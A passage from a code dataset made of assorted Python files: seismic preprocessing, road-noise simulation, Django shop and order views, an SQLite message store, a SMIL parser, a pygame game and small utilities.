np.gcd(org_rate, samp_rate)\n if rate==1: print('warning: bad sampling rate!'); return []\n decim_factor = int(org_rate / rate)\n resamp_factor = int(samp_rate / rate)\n if decim_factor!=1: st = st.decimate(decim_factor)\n if resamp_factor!=1: st = st.interpolate(samp_rate)\n # filter\n st = st.detrend('demean').detrend('linear').taper(max_percentage=0.05, max_length=10.)\n flt_type, freq_rng = freq_band\n if flt_type=='highpass':\n return st.filter(flt_type, freq=freq_rng)\n if flt_type=='bandpass':\n return st.filter(flt_type, freqmin=freq_rng[0], freqmax=freq_rng[1])\n\ndef read_stream(stream_paths):\n stream = read(stream_paths[0])\n stream += read(stream_paths[1])\n stream += read(stream_paths[2])\n if to_prep: return preprocess(stream)\n else: return stream\n\ndef calc_norm(data, npts):\n data_cum = [np.cumsum(di**2) for di in data]\n return np.array([np.sqrt(cumi[npts:]-cumi[:-npts]) for cumi in data_cum])\n\n# format transform\ndef st2np(stream, npts):\n st_np = np.zeros([len(stream), npts], dtype=np.float64)\n for i,trace in enumerate(stream): st_np[i][0:npts] = trace.data[0:npts]\n return st_np\n\n","sub_path":"hypodd/small/dataset_ph2dt_cc.py","file_name":"dataset_ph2dt_cc.py","file_ext":"py","file_size_in_byte":6219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121310274","text":"import json\nimport os\n\nfrom django.shortcuts import render\nimport requests\n\nfrom double_post_check.forms import Post\n\n\ndef index(request):\n context = {'form': Post}\n\n if request.method == 'POST':\n form = Post(request.POST)\n if form.is_valid():\n message = form.cleaned_data['text']\n if message:\n response = json.loads(requests.get(\n os.environ['DOUBLE_POST_URL'],\n params={'message': message}\n ).text)\n if response['display']:\n context['previous'] = {\n 'input': message,\n 'display': response['display']\n }\n else:\n context['all_clear'] = True\n\n return render(\n request,\n 'double_post_check/index.html',\n context,\n )\n","sub_path":"double_post_check/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"187657164","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy as sp\nfrom scipy import signal\nimport math\nfrom 
scipy.io import wavfile\nimport wavio\nfrom scipy import interpolate\nimport soundfile as sf\nfrom librosa import resample\nimport scipy.signal as sps\n#Todo: Una CDF diversa per ogni banda in frequenza per i transienti. Però andrebbero identificati come righe, non come intervalli, se sono crack. La strada brutta, on the other hand, non è un crack ma è un brutto uniforme, e ci si aspetta che porti a un aumento del livello medio broadband.\nfile='F:/pint/Misure Coltano/pint/unzipped/run_spezzate/giro_lungo.wav'\nsampling_rate, data=wavfile.read(file)\ndurabin=0.2 #Durata in secondi di ogni intervallo su cui fare la PSD\n#Data_IRF=data[559*44100:594*44100]\nIRF=plottapsdbucata(data, (559, 594)) #Asse X è in IRF[1], asse Y è in IRF[0], moltiplica sempre il segnale per IRF[0] e plotta irf[1],sig*irf[0]\nIRF=np.array(IRF)\n#IRF[0]/=(35/durabin) #Riporto la potenza a valori contenuti in 0.2 secondi\nplt.close() #per rivederlo: plt.loglog(IRF[1], IRF[0])\npezzobello=data[559*44100:594*44100]\ncrack=data[167*44100:174*44100]\nscale=813.5330/32767\n\n\n#Da debuggare, vedi descrizione.\ndef PSDToSeries(lenTimeSeries,freq,psdLoad):\n '''\n Genera una serie temporale compatibile con la PSD fornita in input. Per qualche ragione mi raddoppia le frequenze. Vabè.\n\n '''\n #\n #Intervallo in frequenza\n df=freq[1]-freq[0]\n #print('df = ', df)\n\n spettro0=psdLoad\n irf0=IRF[1]\n f=interpolate.interp1d(irf0, spettro0, kind='linear')\n irf1=np.linspace(IRF[1][0], IRF[1][-1], num=int(lenTimeSeries))\n spettro1=f(irf1)\n binwidth=(irf1[1:]-irf1[:-1])[0]\n #Ampiezze spettrali, prese dai bin PSD: attenzione che è dilatato dall'oversampling\n amplitude=np.sqrt(4*spettro1*binwidth)\n\n #creo i vettori\n epsilon=np.zeros((len(amplitude)))\n randomSeries=np.zeros((len(amplitude)))\n\n\n #Creo la serie temporale: fase random tra -pi e pi\n #Generate random phases between [-2pi,2pi]\n epsilon=np.pi * (2*np.random.randn(1,len(amplitude))-1)\n\n #Inverse Fourier\n randomSeries=np.real(np.fft.ifft(amplitude*np.exp(epsilon*1j*2*np.pi)))\n\n return np.reshape(randomSeries, np.shape(randomSeries)[1])#faglielo direttamente riuscire col resampling perché qui è a 22050 Hz\n\n# Genera un rumore bianco di media mean varianza std lungo seconds (campionato a 44100 Hz)\ndef genwhite (mean, std, seconds):\n num_samples = 44100\n samples = np.random.normal(mean, std, size=math.floor(seconds*num_samples))\n return (samples)\n\ndef genstradabella(s):\n return(genwhite(1,5.54e-3,s))\n\n# def genspettrobello(irf=IRF):\n# logmean=1.0186691440524822\n# logvar=0.1763178502675603\n# mean=-2*log(logmean)-0.5*np.log(logvar+logmean**2)\n# std=np.sqrt(-2*log(logmean)+np.log(logvar+logmean**2))\n# #std=0.42\n# spettro=np.random.lognormal(mean, std, 2049)\n return (spettro*IRF[0])\n\ndef genspettroIRF(CDF, pdf):\n spettro=FromCDF(CDF,pdf)\n return (np.array(spettro)*IRF[0])\n\n\n# Genera il segnale atteso da una buca che dura seconds secondi, campionato a 44100 Hz\n# Per ora è un segnale sinusoidale con finestra gaussiana senza posibilità di variarlo in intensità o in frequenza, magari più in avanti sarà più raffinato man mano che la nostra conoscenza delle buche migliora\ndef pothole (seconds): # a 40km/h fai 30 cm (tombino quadratico medio) in 0.27 secondi\n samples=math.floor(seconds*44100)\n a=np.linspace(0,20,num=samples)\n b=20*np.sin(100*a)\n wind=signal.windows.gaussian(samples, std=samples/10)\n return(b*wind)\n\n#Fa lo zero padding di un vettore: center è la posizione in secondi, length è la durata a cui vogliamo paddare il vettore 
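Annotation: the PSDToSeries docstring above admits the output "mi raddoppia le frequenze" ("doubles my frequencies"); feeding a one-sided amplitude spectrum to np.fft.ifft does exactly that, because ifft expects a two-sided (Hermitian) spectrum. np.fft.irfft is the transform that matches a one-sided input. A hedged sketch: the absolute amplitude scaling depends on the PSD normalisation convention, so calibrate against a known signal before trusting levels.

import numpy as np

def psd_to_series(psd, df, rng=None):
    # psd: one-sided PSD on a uniform frequency grid with spacing df.
    rng = rng or np.random.default_rng()
    amplitude = np.sqrt(2.0 * np.asarray(psd) * df)      # per-bin amplitude
    phases = rng.uniform(-np.pi, np.pi, size=len(amplitude))
    spectrum = amplitude * np.exp(1j * phases)
    # irfft interprets `spectrum` as one-sided, so no mirror frequencies appear.
    return np.fft.irfft(spectrum, n=2 * (len(amplitude) - 1))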
vector\ndef zeropad (vector, center, length):\n sampling=44100\n center=center*sampling\n length=length*sampling\n before=math.floor(center-math.floor(len(vector)/2))\n after=length-(len(vector)+before)\n beforev=np.zeros(before)\n afterv=np.zeros(after)\n padded1=np.concatenate ([beforev,vector])\n padded=np.concatenate ([padded1,afterv])\n return (padded)\n\n#Buca una strada: somma buca a strada nella posizione dove in secondi. Si occupa da solo dello zeropadding\ndef bucastrade (strada, buca, dove):\n stradabucata=strada+zeropad(buca, dove, math.floor(len(strada)/44100))\n xvec=(np.linspace(0,len(strada)/44100, num=len(strada)))\n return (xvec, stradabucata)\n\ndef FromCDF (CDF, pdf):\n CDF=np.array(CDF)\n randx=[]\n for j in range (0,2049):\n xi=np.random.random()\n randx.append(pdf[1][np.max(np.where(CDF Illegal message detected!\")\n print(\"Someone tried to write to a finished sequence.\")\n\n msg_entries = [(msg.__hash__(), msg.sender.hex, msg.seq_number, msg.message_content, False) for msg in msg_objects]\n \n # print(msg_entries)\n\n cursor.executemany(\"\"\"\n INSERT OR IGNORE INTO message VALUES (?,?,?,?,?);\n \"\"\", msg_entries)\n\n conn.commit()\n conn.close()\n except Exception as e:\n print(e)\n traceback.print_exc()\n \n\ndef store_messages_in_pool(messages: [], pool):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n msg_objects = node_message.message_bulk_to_message_array(messages)\n \n msg_entries = [(hash(msg), pool.hex) for msg in msg_objects]\n\n # print(msg_entries)\n\n cursor.executemany(\"\"\"\n INSERT OR IGNORE INTO message_pool VALUES (?,?);\n \"\"\", msg_entries)\n conn.commit()\n conn.close()\n\ndef store_message_with_pool(messages: [], pool):\n store_messages(messages)\n store_messages_in_pool(messages, pool)\n\ndef is_a_message_not_already_stored(messages: []):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n for m in messages:\n cursor.execute(\"\"\"SELECT 1 FROM message WHERE message.msg_hash = ?\"\"\", (hash(m)))\n result = cursor.fetchall()\n if len(result) < 1:\n return True\n return False\n\ndef get_message_for_pool(msg_pool):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n pool_entry = (msg_pool.hex,)\n\n cursor.execute(\"\"\"\n SELECT sender, seq_number, message FROM message JOIN message_pool ON message.msg_hash = message_pool.msg_hash WHERE message_pool.msg_pool = ?;\n \"\"\", pool_entry)\n\n msg_entries = cursor.fetchall()\n messages = [node_message.make_queue_message(uuid.UUID(hex=msg_entry[0]), msg_entry[1], msg_entry[2]) for msg_entry in msg_entries]\n\n conn.close()\n return messages\n\n\ndef get_message_for_pool_and_seq(msg_pool, seq_number):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n pool_entry = (msg_pool.hex, seq_number)\n\n cursor.execute(\"\"\"\n SELECT sender, seq_number, message FROM message JOIN message_pool ON message.msg_hash = message_pool.msg_hash WHERE message_pool.msg_pool = ? 
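Annotation: FromCDF above (its record is cut off mid-expression in this dump) draws spectrum values by inverting an empirical CDF. The standard vectorised form of that inverse-transform lookup uses np.searchsorted; this is a reconstruction of the idea, not the author's exact code:

import numpy as np

def sample_from_cdf(cdf, values, n, rng=None):
    # cdf: monotone array in [0, 1]; values: the grid the CDF is defined on.
    rng = rng or np.random.default_rng()
    u = rng.random(n)
    idx = np.searchsorted(cdf, u)      # first index with cdf[idx] >= u
    return np.asarray(values)[np.clip(idx, 0, len(values) - 1)]

cdf = np.linspace(0.0, 1.0, 101)       # CDF of Uniform(0, 1) on a grid
samples = sample_from_cdf(cdf, np.linspace(0.0, 1.0, 101), n=5)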
AND message.seq_number = ?;\n \"\"\", pool_entry)\n\n msg_entries = cursor.fetchall()\n messages = [node_message.make_queue_message(uuid.UUID(hex=msg_entry[0]), msg_entry[1], msg_entry[2]) for msg_entry in msg_entries]\n\n conn.close()\n return messages\n\ndef store_round(seq):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n seq = (seq,)\n\n cursor.execute(\"\"\"\n UPDATE message SET confirmed = 1 WHERE seq_number = ?;\n \"\"\", seq)\n\n conn.commit()\n conn.close()\n\ndef get_messages_for_round(seq_number):\n conn = sqlite3.connect(db_name)\n cursor = conn.cursor()\n\n cursor.execute(\"\"\"\n SELECT sender, seq_number, message FROM message WHERE seq_number = ? ORDER BY message.msg_hash DESC\n \"\"\", (seq_number,))\n\n msg_entries = cursor.fetchall()\n messages = [node_message.make_queue_message(uuid.UUID(hex=msg_entry[0]), msg_entry[1], msg_entry[2]) for msg_entry in msg_entries]\n\n conn.close()\n\n return messages\n","sub_path":"src/node_message_store.py","file_name":"node_message_store.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"65594379","text":"#coding=utf-8\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.shortcuts import render_to_response, redirect, get_object_or_404\nfrom django.template import RequestContext\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import *\nfrom decimal import Decimal\nfrom apps.accounts.models import Address, UserProfile\nfrom lib.common import generate_pagination\nfrom django.contrib.auth.decorators import permission_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\n@login_required\ndef cart_details(request):\n title = _(u'我的购物车')\n obj_list = Cart.objects.filter(account=request.user, amount__gt=0)\n sum_price = Decimal(0)\n points_form = UserPointsForm(request.user)\n messages = []\n try:\n profile = UserProfile.objects.get(user=request.user)\n except UserProfile.DoesNotExist:\n pass\n for i in obj_list:\n #计算总价\n if i.product.is_sale:\n sum_price += i.amount * Decimal(i.product.sale_price)\n else:\n sum_price += i.amount * Decimal(i.product.price)\n #处理购物车内超过库存的数据\n if i.amount > i.product.stocks:\n i.amount = i.product.stocks\n i.save()\n if i.amount > 0:\n messages.append(u'“%(name)s”只剩下%(count)s件了,已为您重新设置了数量' % {'name': i.product.brand + i.product.name, 'count': i.amount})\n else:\n messages.append(u'“%(name)s”没有货了,已为您取消了' % {'name': i.product.brand + i.product.name})\n address_list = Address.objects.filter(user=request.user).order_by('-is_default')\n #取地址表单\n if address_list:\n default_pk = address_list[0].pk\n for i in address_list:\n if i.is_default:\n default_pk = i.pk\n address_form = SelectAddressForm(default_pk=default_pk)\n address_form.fields['address'].queryset = address_list\n return render_to_response(\"cart.html\", locals(), context_instance=RequestContext(request))\n\n\n@login_required\ndef ajax_get_cart_count(request):\n count = ''\n if request.user.is_authenticated():\n count = Cart.objects.filter(account=request.user, amount__gt=0).count()\n return HttpResponse(count)\n\n\n@login_required\ndef ajax_cart_edit(request):\n if request.method == 'POST':\n if request.user.is_authenticated() and request.POST.has_key('id') and request.POST.has_key('amount'):\n new_amount = 0\n try:\n new_amount = int(request.POST.get('amount', 0))\n except ValueError:\n return HttpResponse(status=404)\n try:\n cart = 
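Annotation: node_message_store.py above leans on two sqlite3 idioms worth isolating: '?' placeholders (never string formatting) and INSERT OR IGNORE for de-duplication via the primary key. One caveat in the sample itself: it keys rows on Python's built-in hash(), which is salted per process for strings unless PYTHONHASHSEED is pinned, so those hashes may not be stable across restarts. A minimal sketch of the insert pattern:

import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE message (msg_hash INTEGER PRIMARY KEY, body TEXT)')
rows = [(1, 'hello'), (2, 'world'), (1, 'dropped: duplicate key')]
# executemany + '?' placeholders is injection-safe; OR IGNORE skips
# primary-key collisions instead of raising IntegrityError.
conn.executemany('INSERT OR IGNORE INTO message VALUES (?, ?)', rows)
conn.commit()
print(conn.execute('SELECT COUNT(*) FROM message').fetchone()[0])  # -> 2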
Cart.objects.get(account=request.user, pk=request.POST.get('id', u''))\n cart.amount = new_amount\n cart.save()\n obj_list = Cart.objects.filter(account=request.user)\n sum_price = Decimal(0)\n for i in obj_list:\n if i.product.is_sale:\n sum_price += i.amount * Decimal(i.product.sale_price)\n else:\n sum_price += i.amount * Decimal(i.product.price)\n return HttpResponse(sum_price)\n except Cart.DoesNotExist:\n return HttpResponse(status=404)\n else:\n return HttpResponse(status=402)\n return HttpResponse(status=403)\n\n\nfrom django.db import transaction\n@login_required\ndef order_create(request):\n with transaction.commit_on_success():\n if request.method == 'POST':\n point_form = UserPointsForm(data=request.POST, user=request.user)\n use_points = 0\n if point_form.is_valid():\n use_points = point_form.cleaned_data['points']\n addr_form = SelectAddressForm(data=request.POST, default_pk=None)\n addr_form.fields['address'].queryset = Address.objects.filter(user=request.user).order_by('-is_default')\n if addr_form.is_valid():\n try:\n addr = Address.objects.get(user=request.user, pk=addr_form.cleaned_data['address'].pk)\n except Address.DoesNotExist:\n return redirect('cart_details')\n try:\n cart_list = Cart.objects.filter(account=request.user, amount__gt=0)\n #购物车内有东西时���创建订单\n if cart_list:\n order = Order(\n status=u'已保存',\n account=request.user,\n amount=0,\n use_points=use_points,\n need_pay=0,\n ship_name=addr.name,\n ship_mobile=addr.mobile,\n ship_address=addr.address,\n extra=addr_form.cleaned_data['extra']\n )\n order.save()\n sum_price = 0\n for i in cart_list:\n if i.amount > i.product.stocks:\n #订购数量超过库存就把订单和所有记录删掉,返回订单提交页\n order.delete()\n return redirect('cart_details')\n price = 0\n if i.product.is_sale:\n price = i.product.sale_price\n else:\n price = i.product.price\n order_product = OrderProduct.objects.create(\n product_id=i.product.pk,\n product_count=i.amount,\n product_name=i.product.brand + i.product.name,\n product_price=price,\n prodct_purchase_price=i.product.purchase_price,\n product_no=i.product.no,\n product_barcode=i.product.barcode,\n product_catalog=i.product.catalog.pk,\n product_cover=i.product.cover\n )\n order_product.save()\n order.products.add(order_product)\n if i.product.is_sale:\n sum_price += i.amount * Decimal(i.product.sale_price)\n else:\n sum_price += i.amount * Decimal(i.product.price)\n order.amount = sum_price\n order.need_pay = sum_price - Decimal(use_points) * Decimal('0.01')\n #首先保证有profile\n try:\n profile = UserProfile.objects.get(user=request.user)\n #如果使用点数超过总价,则设置为最大\n if not order.need_pay > 0:\n order.need_pay = 0\n order.use_points = float(sum_price) / 0.01\n order.amount = sum_price\n order.need_pay = 0\n profile.points -= order.use_points\n else:\n profile.points -= use_points\n profile.save()\n except UserProfile.DoesNotExist:\n pass\n\n order.save()\n Cart.objects.filter(account=request.user).delete()\n return redirect('order_details', order.pk)\n else:\n return redirect('cart_details')\n except Cart.DoesNotExist:\n pass\n else:\n return redirect('cart_details')\n\n return HttpResponse(status=404)\n\n\n@login_required\ndef order_list(request):\n title = _(u'我的订单')\n page = request.GET.get('page', '1')\n page_size = 10\n try:\n page = int(page)\n except ValueError:\n page = 1\n order_list = Order.objects.filter(account=request.user, is_display=True).order_by('-date_time', '-pk')\n paginator = Paginator(order_list, page_size)\n try:\n order_list = paginator.page(page)\n page_list = 0\n page_range = generate_pagination(page, 
paginator.num_pages)\n except PageNotAnInteger:\n order_list = paginator.page(1)\n except EmptyPage:\n order_list = paginator.page(paginator.num_pages)\n return render_to_response(\"order_list.html\", locals(), context_instance=RequestContext(request))\n\n\n@login_required\ndef order_details(request, pk):\n title = _(u'我的订单')\n order = get_object_or_404(Order, account=request.user, pk=pk, is_display=True)\n use_points = order.need_pay - order.amount\n return render_to_response(\"order_details.html\", locals(), context_instance=RequestContext(request))\n\n\n@login_required\ndef order_cancel(request, pk):\n order = get_object_or_404(Order, account=request.user, pk=pk, status=u'已保存', is_display=True)\n order.status = u'主动取消'\n order.save()\n return redirect('order_details', pk)\n\n\nfrom django.db.models import Q\n@login_required\ndef order_delete(request, pk):\n order = get_object_or_404(Order, Q(status=u'已取消') | Q(status=u'主动取消') | Q(status=u'已完成交易'), account=request.user, pk=pk)\n order.is_display = False\n order.save()\n return redirect('order_list')\n\n\n@permission_required('orders.change_order')\ndef order_print(request, pk):\n order = get_object_or_404(Order, pk=pk)\n use_points = order.use_points * 0.01\n return render_to_response(\"order_print.html\", locals(), context_instance=RequestContext(request))\n\n\n@permission_required('orders.change_order')\ndef order_adminedit(request, pk):\n with transaction.commit_on_success():\n order = get_object_or_404(Order, pk=pk, is_locked=False)\n #return HttpResponse(order.need_pay)\n if request.method == 'POST':\n post_form = OrderProductsEditForm(data=request.POST)\n if post_form.is_valid():\n pid = post_form.cleaned_data['pid']\n count = post_form.cleaned_data['count']\n obj = order.products.get(product_id=pid)\n #使用点数超过总价的话,返还点数\n sum_price = Decimal(0)\n #获取总价\n use_points_offset = 0\n use_points = order.use_points\n for i in order.products.all():\n if i.product_id == pid:\n i.product_count = count\n i.save()\n sum_price += i.product_count * Decimal(i.product_price)\n #使用点数大于总价,重新计算实付,并返还差额点数\n if use_points * 0.01 > sum_price:\n use_points_offset = use_points - float(sum_price) / 0.01\n use_points = float(sum_price) / 0.01\n order.use_points = use_points\n order.need_pay = sum_price - Decimal((use_points * 0.01).__str__())\n try:\n profile = UserProfile.objects.get(user=request.user)\n profile.points += use_points_offset\n profile.save()\n except UserProfile.DoesNotExist:\n pass\n order.amount = sum_price\n order.save()\n #刷新父页面标志\n is_changed = True\n #return redirect('order_adminedit', pk)\n else:\n return HttpResponse('aaa')\n product_forms = []\n for p in order.products.all().order_by('product_id'):\n product_forms.append(OrderProductsEditForm(initial={'pid': p.product_id, 'count': p.product_count, 'name': p.product_name, 'order_id': order.pk}))\n return render_to_response(\"order_adminedit.html\", locals(), context_instance=RequestContext(request))","sub_path":"apps/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"439453998","text":"class Solution(object):\n def findStrobogrammatic(self, n):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n #pair can't begin with 0\n #if n is even: we need to generate n/2 pairs\n #if n is odd, we need to generate n/2 pairs, and one from [0,1,8]\n if n == 0:\n return []\n if n == 1:\n return ['0','8','1']\n \n sysmetric = ['0','8','1']\n cand = 
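Annotation: order_list above casts page to int before calling paginator.page(page), which means its PageNotAnInteger branch can never fire; handing the raw GET value straight to the Paginator lets its own exceptions do that validation. A sketch of the usual pattern:

from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger

def get_page(queryset, raw_page, per_page=10):
    paginator = Paginator(queryset, per_page)
    try:
        return paginator.page(raw_page)             # raw request.GET value
    except PageNotAnInteger:
        return paginator.page(1)                    # non-numeric -> first page
    except EmptyPage:
        return paginator.page(paginator.num_pages)  # too large -> last page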
['0','1','6','9','8']\n Mirror = {\n '0':'0',\n '1':'1',\n '6':'9',\n '8':'8',\n '9':'6'\n }\n #generate length = n/2 sub-array \n res = []\n def dfs_generate(path,length):\n if len(path) == length:\n res.append(path)\n return\n if len(path) == 0:\n for c in cand[1:]:\n dfs_generate(path+[c],length)\n else:\n for c in cand:\n dfs_generate(path+[c],length)\n dfs_generate([],n/2)\n \n \n #check, if odd, add addition one\n if n%2 == 1:\n temp = []\n for k in range(len(res)):\n for c in sysmetric:\n temp.append(res[k]+[c])\n res = temp\n \n #generate \n StrobogrammaticNumbers = []\n for k in range(len(res)):\n for i in range(1,n/2+1):\n res[k].append(Mirror[res[k][n/2-i]])\n StrobogrammaticNumbers.append(\"\".join(res[k]))\n \n \n return StrobogrammaticNumbers\n","sub_path":"Strobogrammatic-Number-II.py","file_name":"Strobogrammatic-Number-II.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"85606535","text":"from ..core.database import database\nfrom ..core.language.names import extract_first_name, first_name_gender\n\ndef copy_tweets_to_analyse():\n\t\"\"\"Copies all tweets into a new database table for manipulation\"\"\"\n\tfor tweet in database.get_tweets():\n\t\tuser = tweet.user\n\t\ttext = tweet.text\n\t\thashtags = tweet.hashtags\n\t\tsearch_topic = tweet.search_topic\n\n\t\tdatabase.add_tweet_analysis(user, text, hashtags, str(None), search_topic)\n\ndef all_tweets_gender():\n\tfor tweet in database.get_tweets_analysis():\n\t\tuser = tweet.user\n\t\tfirst_name = extract_first_name(user)\n\n\t\tif first_name: \n\t\t\tgender = first_name_gender(first_name)[first_name]\n\n\t\telse: \n\t\t\tgender = str(None)\n\n\t\ttweet.gender = gender\n\t\tdatabase.commit()\n\n\t\tprint('--------')\n\t\tprint(tweet.user)\n\t\tprint(first_name)\n\t\tprint(gender)\n\t\tprint('--------')","sub_path":"twittermining/election/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"568176879","text":"\"\"\"\nMethods that execute specific queries against the SQLite database for the CONDITIONS table.\nThis supports the policy_sentry query functionality\n\"\"\"\nfrom sqlalchemy import and_\nfrom policy_sentry.shared.database import ConditionTable\n\n\n# Per service\ndef get_condition_keys_for_service(db_session, service):\n \"\"\"Get a list of available conditions per AWS service\"\"\"\n results = []\n rows = db_session.query(ConditionTable.condition_key_name, ConditionTable.condition_value_type,\n ConditionTable.description).filter(ConditionTable.service.like(service))\n for row in rows:\n results.append(str(row.condition_key_name))\n return results\n\n\n# Per condition key name\ndef get_condition_key_details(db_session, service, condition_key_name):\n \"\"\"Get details about a specific condition key in JSON format\"\"\"\n rows = db_session.query(ConditionTable.condition_key_name, ConditionTable.condition_value_type,\n ConditionTable.description).filter(and_(ConditionTable.condition_key_name.like(condition_key_name), ConditionTable.service.like(service)))\n result = rows.first()\n output = {\n 'name': result.condition_key_name,\n 'description': result.description,\n 'condition_value_type': result.condition_value_type\n }\n return 
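Annotation: the pair generation in findStrobogrammatic above also has a compact recursive formulation that builds numbers from the middle outwards; note the sample's n/2 arithmetic is Python 2 integer division and would need n // 2 in Python 3. A self-contained sketch:

PAIRS = [('0', '0'), ('1', '1'), ('6', '9'), ('8', '8'), ('9', '6')]

def strobogrammatic(n):
    def build(k):
        if k == 0:
            return ['']
        if k == 1:
            return ['0', '1', '8']
        # Wrap every shorter core in each mirrored digit pair.
        return [a + core + b for core in build(k - 2) for a, b in PAIRS]
    # Multi-digit numbers must not start with '0'.
    return [s for s in build(n) if n == 1 or s[0] != '0']

print(strobogrammatic(2))   # ['11', '69', '88', '96']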
output\n","sub_path":"policy_sentry/querying/conditions.py","file_name":"conditions.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"631015045","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nPractica 3\n\"\"\"\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\n\n\"\"\"\nCreamos clase\n\"\"\"\n\n\nclass SmallSMILHandler(ContentHandler):\n \"\"\"\n Inicializamos.\n \"\"\"\n def __init__(self):\n self.lista = []\n self.dic = {'root-layout': ['width', 'height', 'background-color'],\n 'region': ['id', 'top', 'bottom', 'left', 'right'],\n 'img': ['src', 'region', 'begin', 'dur'],\n 'audio': ['src', 'begin', 'dur'],\n 'textstream': ['src', 'region']}\n \"\"\"\n El parsel lo llama cuando encuentra la etiqueta.\n \"\"\"\n def startElement(self, name, attrs):\n if name in self.dic:\n self.atributos = {}\n for item in self.dic[name]:\n self.atributos[item] = attrs.get(item, \"\")\n self.crear_lista(name, self.atributos)\n\n \"\"\"\n Devuelve la lista con las etiquetas encontradas\n \"\"\"\n def get_tags(self):\n return self.lista\n\n \"\"\"\n Creamos una lista segun lo que va encontrando\n \"\"\"\n def crear_lista(self, nombre, atributos):\n etiqueta = []\n etiqueta.append(nombre)\n etiqueta.append(atributos)\n self.lista.append(etiqueta)\n return self.lista\n\n\n\"\"\"\nPara que imprima la lista\n\"\"\"\n\n\ndef print_list(list):\n for element in list:\n print (element)\n\n\nif __name__ == \"__main__\":\n parser = make_parser()\n cHandler = SmallSMILHandler()\n parser.setContentHandler(cHandler)\n parser.parse(open('karaoke.smil'))\n print_list(cHandler.get_tags())\n","sub_path":"smallsmilhandler.py","file_name":"smallsmilhandler.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129669757","text":"import sys\n\nimport pygame as pygame\nfrom pygame.sprite import Group\n\nfrom game.main.gun.hurt import judge_bullet_group\nfrom game.main.monster.bullet_monster import BulletMonster\nfrom game.main.monster.death_monster import DeathMonster\nfrom game.main.person.person import Person\nfrom game.main.prop.check_events import check_event\nfrom game.main.prop.settings import Settings\n\n\ndef run_game():\n pygame.init()\n ai_setting = Settings()\n screen = pygame.display.set_mode((ai_setting.scree_width, ai_setting.scree_height))\n pygame.display.set_caption(\"new game\")\n people = Person(screen)\n hero_bullets = Group()\n monster_group = Group()\n monster_bullets = Group()\n add_monster(monster_group, people, screen, ai_setting)\n while True:\n screen.fill(ai_setting.bg_color)\n check_event(people, hero_bullets)\n people.move()\n blit_flush_hero(people, hero_bullets)\n bit_flush_monster(monster_group, monster_bullets)\n if not judge_bullet_group(monster_bullets, people):\n \"\"\"目前默认hero死亡直接退出\"\"\"\n sys.exit()\n judge_bullet_group(hero_bullets, monster_group)\n for bullet in hero_bullets.copy():\n if bullet.rect.centerx <= 0 or bullet.rect.centery <= 0:\n hero_bullets.remove(bullet)\n for bullet in monster_bullets.copy():\n if bullet.rect.centerx <= 0 or bullet.rect.centery <= 0:\n monster_bullets.remove(bullet)\n pygame.display.flip()\n\n\ndef add_monster(monster_group, hero, screen, setting):\n i = 0\n while i < 2:\n bullet_monster = BulletMonster(hero, screen, setting)\n monster_group.add(bullet_monster)\n i += 1\n death_monster = DeathMonster(hero, screen, 
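Annotation: SmallSMILHandler above is only exercised against karaoke.smil on disk; xml.sax.parseString lets the same ContentHandler pattern be tested against an in-memory document. A minimal self-contained variant of that pattern (not the author's class):

from xml.sax import parseString
from xml.sax.handler import ContentHandler

class TagCollector(ContentHandler):
    """Tiny stand-in for the SmallSMILHandler pattern above."""
    def __init__(self):
        super().__init__()
        self.tags = []
    def startElement(self, name, attrs):
        # dict(attrs) mirrors how the sample reads optional attributes.
        self.tags.append((name, dict(attrs)))

handler = TagCollector()
parseString(b'<smil><img src="a.png" region="r1"/></smil>', handler)
print(handler.tags)  # [('smil', {}), ('img', {'src': 'a.png', 'region': 'r1'})]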
setting)\n monster_group.add(death_monster)\n\n\ndef blit_flush_hero(people, hero_bullets):\n people.blitme()\n for bullet in hero_bullets:\n bullet.draw_bullet()\n\n\ndef bit_flush_monster(monster_group, monster_bullets):\n for monster in monster_group:\n monster.monster_action(monster_bullets)\n monster.draw()\n for bullet in monster_bullets:\n bullet.draw_bullet()\n\n\nrun_game()\n","sub_path":"game/main/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"16532933","text":"import pandas as pd\nimport datetime\nimport re\nimport os\nimport csv\nfrom reftypes import db\n\n\ndef check_db(base, val):\n\n # Check validity of base and scores values\n if not base in db.keys():\n raise KeyError(\"Citation database not recognised. Supported values are 'wos' (Web of Science) and 'scopus' (Scopus).\")\n # Check validity of base and scores values\n if not val in db[base].keys():\n raise KeyError(\"Scores value not recognised. Supported values are 'so' (source), 'pu' (publisher) and 